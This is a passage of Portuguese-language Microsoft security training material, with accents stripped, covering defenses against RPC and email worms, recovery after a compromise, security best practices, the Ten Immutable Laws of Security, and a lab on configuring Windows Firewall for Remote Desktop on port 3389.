Permetro Firewall de rede deve bloquear esse processo desde o incio Rede Examine ou detecte sistemas vulnerveis Desative os usos da rede para hosts vulnerveis Use a Quarentena do RRAS para garantir que os hosts de discagem receberam os patches adequados Host Use o IPSec para permitir o UDP 135 de entrada somente em hosts que necessitam de RPC O firewall do Windows para bloquear trfego de entrada no desejado para hosts (Windows XP e superior)

1.53.

Worm de email

Permetro Examine todos os anexos no gateway SMTP Rede Use a Quarentena do RRAS para verificar o nvel do patch e as assinaturas de vrus Aplicativo Microsoft Office 98 Verifique se a atualizao de segurana do Microsoft Outlook 98 est instalada Office 2000 Verifique se pelo menos o Service Pack 2 est instalado Office XP e Office 2003 A configurao de zona de segurana padro Sites Restritos (em vez da Internet) e o script ativo em sites restritos tambm desabilitado por padro Usurios Ensine aos usurios que os anexos podem ser mal-intencionados. Se receber um anexo que no solicitou, escreva para o autor para confirmar que ele queria mesmo envi-lo antes de abrir o anexo

1.54. Um hacker invadiu minha mquina antes que eu pudesse instalar um patch! Permetro Habilite o firewall Rede Desconecte o cabo de rede Host Inicie o sistema e faa logon Credenciais administrativas locais podem ser necessrias se as credenciais em cache estiverem desabilitadas. Ative o firewall do Windows para bloquear todo o trfego de entrada Reconecte o cabo de rede Baixe e instale o patch Reinicialize Desative o firewall do Windows de acordo com a diretiva

possvel que um ataque infecte um computador antes que os patches ou as correes possam ser aplicadas. Para impedir dano em outros computadores na rede enquanto est consertando o computador, siga estas etapas: Desconecte o cabo de rede. Inicie o sistema e faa logon. Voc precisa de credenciais administrativas locais se as credenciais em cache estiverem desabilitadas. Ative o firewall do Windows para bloquear todo o trfego de entrada. Reconecte o cabo de rede. Baixe e instale o patch. Reinicialize. Desative o firewall do Windows de acordo com a diretiva.

1.55.

Prticas recomendadas

Neste tpico, iremos nos concentrar nas prticas recomendadas para segurana. Especificamente, abordaremos: Prticas recomendadas de segurana. Uma lista de verificao de segurana. Prticas recomendadas de segurana Proteo em camadas Proteo desde a criao Menor privilgio para aplicativos e usurios Aprenda com erros passados Mantenha nveis de segurana Direcione a ateno dos usurios para o reconhecimento da segurana Desenvolva e teste planos e procedimentos de resposta a incidentes

1.56.

Siga o modelo de proteo em camadas. Cada camada no modelo protegida pelas camadas adjacentes e depende de todas as camadas que foram implementadas. H um compromisso constante entre funcionalidade e segurana. Os dois raramente so complementares. Apesar do foco anteriormente ter sido fornecer funcionalidade, agora ele est firmemente na segurana. Isso facilita uma cultura protegida desde a criao. O software e os sistemas so protegidos por padro e desde a criao, facilitando a criao de um ambiente de rede seguro.

Os processos e os aplicativos que esto sendo executados em um sistema de computador fazem isso com um nvel definido de privilgio sobre o sistema. A menos que configurado de outra forma, os processos que so iniciados enquanto um usurio faz logon no sistema so executados com o mesmo privilgio desse usurio. Para impedir ataques acidentais, todos os usurios do sistema devem fazer logon com o menor privilgio necessrio para executar suas funes. Os vrus so executados com o privilgio do usurio que fez logon. Como resultado, os vrus tero um escopo mais abrangente se o usurio tiver feito logon como administrador. Os aplicativos e servios tambm devem ser executados com o menor privilgio necessrio. muito importante que voc entenda que a segurana no uma meta; ela uma trajetria. No existe um ambiente completamente seguro. Novos vrus, patches e exploraes esto sempre ocorrendo. Aprenda com a experincia e mantenha registros de tudo. Para manter os nveis de segurana, implemente procedimentos de monitoramento e auditoria e certifique-se de que esses procedimentos so realizados regularmente. Ter planos e procedimentos de resposta a incidentes claros, abrangentes e bem testados a chave para habilitar uma reao rpida e controlada a ameaas. Lista de verificao de segurana

1.57.

A segurana inicia com educao e instruo. No d chances ou permita que as pessoas tomem suas prprias decises. Documente tudo e crie procedimentos e processos para todas as funes de negcios. Sempre que os usurios precisarem fazer algo, eles devem ter um documento disponvel que contenha instrues detalhadas. Fique longe do perigo mantendo-se atualizado em questes de segurana. A Microsoft enviar boletins de segurana para assinantes atravs de emails. Muitos ataques so feitos contra falhas de segurana para as quais h um patch disponvel. Certifique-se de que est atualizado com o gerenciamento de patches. Lembre-se da proteo em camadas. Implemente procedimentos de segurana em todos os nveis do modelo porque eles dependem uns dos outros. Uma rede to segura quanto seu ponto mais fraco. A importncia de backups regulares no pode ser enfatizada o bastante. A perda ou a alterao de dados pode ser catastrfica para um negcio. Backups regulares so timos. Sempre armazene os dados de backup em outro local. Execute procedimentos de restaurao regulares tambm. Compreenda como pode ser atacado. Familiarize-se com ferramentas e vrus de hackers. Investigue onde os ataques acontecem e como. A pesquisa CSI/FBI Computer Crime and Security Survey pode ser um bom comeo.

1.58.

Dez leis de segurana imutveis

Neste tpico final, discutiremos as 10 leis imutveis da segurana.

Cap1-27.jpg 1. Quando voc escolhe executar um programa, voc est tomando a deciso de colocar o controle de seu computador nele. Depois que um programa est sendo executado, ele pode fazer qualquer coisa, at os limites do que voc mesmo pode fazer na mquina. 2. No final, um sistema operacional apenas uma srie de uns e zeros que, quando interpretados pelo processador, fazem com que a mquina faa certas coisas. Altere os uns e os zeros e ele far algo diferente. Onde os uns e os zeros esto armazenados? Na mquina, junto com todo o resto! Eles so apenas arquivos e se outras pessoas que usam a mquina puderem alterar esses arquivos, o "jogo termina". 3. Se algum tem acesso fsico ao seu computador, ele tem controle completo sobre o computador e pode fazer qualquer coisa nele como modificar dados, roubar dados, tirar o hardware ou destru-lo fisicamente.

4. Se voc executa um site, precisa limitar o que os visitantes podem fazer. Voc deve permitir um programa no site somente se voc mesmo o escreveu ou se confia no desenvolvedor que o escreveu. Mas isso pode no ser o bastante. Se o site um de vrios hospedados em um servidor compartilhado, voc precisa ter mais cuidado. Se uma pessoa malintencionada comprometer um dos sites no servidor, possvel que ele possa estender esse controle para o servidor e com isso controlar todos os sites dele incluindo o seu. 5. Se um hacker poder obter sua senha, ele poder fazer logon no seu computador e fazer qualquer coisa no computador que voc pode fazer. Sempre use uma senha; incrvel como vrias contas tm senhas em branco. E escolha uma complexa. No use o nome do seu cachorro, sua data de aniversrio ou o nome do time de futebol local. E no use a palavra senha! 6. Um administrador no confivel pode reverter qualquer medida de segurana que voc tomar. Ele pode alterar as permisses na mquina, modificar as diretivas de segurana do sistema, instalar software malintencionado, adicionar usurios inexistentes ou fazer um milho de outras coisas. Ele pode eliminar virtualmente qualquer medida de proteo no sistema operacional pois ele a controla. Pior que tudo, ele pode cobrir suas trilhas. Se voc tem um administrador no confivel, voc no tem nenhuma segurana. 7. Muitos sistemas operacionais e produtos de software de criptografia concedem a voc uma opo para armazenar chaves criptogrficas no computador. A vantagem a convenincia voc no precisa lidar com a chave mas ela est embutida no custo da segurana. As chaves so normalmente ofuscadas (ou seja, ocultas) e alguns dos mtodos de ofuscamento so realmente bons. Mas no final, independente de a chave estar bem oculta ou no, se ela estiver na mquina, poder ser encontrada. Ela tem que ser capaz de ser encontrada: afinal de contas, se o software pode encontr-la, um usurio mal-intencionado suficientemente motivado pode encontr-la tambm. Sempre que possvel, use o armazenamento offline para as chaves. 8. Os programas antivrus funcionam comparando os dados no seu computador com um conjunto de assinaturas de vrus. Cada assinatura caracterstica de um determinado vrus e quando o programa encontrar dados em um arquivo, em um email, ou em algum outro local que corresponda assinatura, ele conclui que ele encontrou um vrus. No entanto, um programa antivrus pode procurar somente vrus que ele conhece. vital que voc mantenha o seu arquivo de assinatura do programa anti-vrus atualizado porque novos vrus so criados todos os dias. 9. A melhor forma de proteger sua privacidade na Internet a mesma forma de proteger a sua privacidade na vida normal atravs do seu comportamento. Leia as declaraes de privacidade nos sites que visita e faa negcio somente com os que possuem prticas com as quais voc concorda. Se estiver preocupado com os cookies, desabilite-os. Mais importante, evite navegao indiscriminada na Web: reconhea que da

mesma forma que a maioria das cidades tm um lado ruim que deve ser evitado, a Internet tambm tem. 10. A segurana perfeita requer um nvel de perfeio que simplesmente no existe e que provavelmente nunca existir. Isso verdade para software e para praticamente todos os campos de interesse humano. O desenvolvimento de software uma cincia imperfeita e praticamente todos eles tm erros. Alguns deles podem ser explorados para causarem violaes de segurana. Isso apenas um fato da vida. Mas mesmo se o software pudesse ser perfeito, isso no resolveria totalmente o problema. A maioria dos ataques envolvem, em menor ou maior grau, alguma manipulao de natureza humana normalmente isso conhecido com a engenharia social. Aumente o custo e a dificuldade de atacar uma tecnologia de segurana e os usurios mal-intencionados respondero mudando os seus focos da tecnologia para o ser humano que est no console. importante que voc compreenda sua funo na manuteno de uma segurana slida ou voc poder se tornar a abertura na sua prpria armadura do sistema. Para exibir o artigo completo sobre as 10 leis imutveis de segurana, consulte: http://www.microsoft.com/technet/columns/security/essays/10imlaws.asp (em ingls)

Prtica 1: Habilitar o firewall do Windows e configur-lo para permitir o acesso porta 3389 Exerccio 1: Criar uma conexo com um escritrio remoto. 1. Inicie a sesso no Windows XP ou Windows Server 2003. 2. Em Iniciar Executar, escreva mstsc.exe e pressione Enter. 3. No campo Computador, escreva o nome ou o endereo IP do computador remoto. 4. Em seguida, pressione o boto Conectar. 5. O sistema remoto solicitar credenciais. Exerccio 2: Como configurar o firewall do Windows para negar a conexo. Este exerccio dever ser realizado no computador remoto. 1. 2. 3. 4. 5. 6. 7. Edite as propriedades de conexo da placa de rede. Selecione a guia Avanado. Em seguida, selecione a caixa Firewall de Conexo com a Internet. Pressione o boto "Configuraes" e edite a configurao do firewall. Verifique se no h servios habilitados. Pressione duas vezes a opo OK. Verifique a conexo com o escritrio remoto a partir do outro computador.

Exerccio 3: Como configurar o firewall do Windows para permitir o uso da porta 3389. Este exerccio dever ser realizado no computador remoto. 1. 2. 3. 4. 5. Pressione o boto "Configuraes" e edite a configurao do firewall. Selecione a caixa rea de Trabalho Remota. Pressione OK duas vezes. Verifique a conexo com o escritrio remoto a partir do outro computador. Verifique a conexo com outros servios.

1.59.

Sumrio da sesso
Viso gerencial Disciplina de gerenciamento de riscos de segurana Proteo em camadas Resposta a incidentes de segurana Cenrios de ataque Prticas recomendadas Dez leis de segurana imutveis

Esta sesso foi uma apresentao dos fundamentos da implementao de um ambiente de computao seguro. Este tpico abrangente e profundo e requer vigilncia e refinamento contnuos de capacidades, processos e procedimentos.

1.60.

Prximas etapas

Obter treinamento adicional de segurana Encontrar seminrios de treinamento on-line e no local: http://www.technetbrasil.com.br Encontrar um CTEC local para treinamento prtico: http://www.microsoft.com/brasil/certifique Implementar uma soluo de gerenciamento de patches Encontrar orientao e informaes sobre ferramentas: http://www.technetbrasil.com.br/seguranca/ferramentas Obter informaes sobre segurana: Inscrever-se em boletins sobre segurana

http://www.microsoft.com/security/security_bulletins/alerts2.asp (em ingls) Obter as orientaes mais recentes sobre segurana da Microsoft: http://www.microsoft.com/technet/security/bestprac/ (em ingls) As prximas etapas incluem a consulta ao site da Microsoft para: Obter treinamento adicional de segurana. Encontrar orientao sobre implementao de uma soluo de gerenciamento de patches. Obter as informaes mais recentes sobre segurana.

1.61.

Para obter mais informaes

Site de segurana da Microsoft (todos os pblicos) http://www.microsoft.com/brasil/security Site de segurana TechNet (profissionais de TI) http://www.technetbrasil.com.br/Seguranca/ Site de Segurana MSDN (desenvolvedores) http://msdn.microsoft.com/security (em ingls)

Você também pode gostar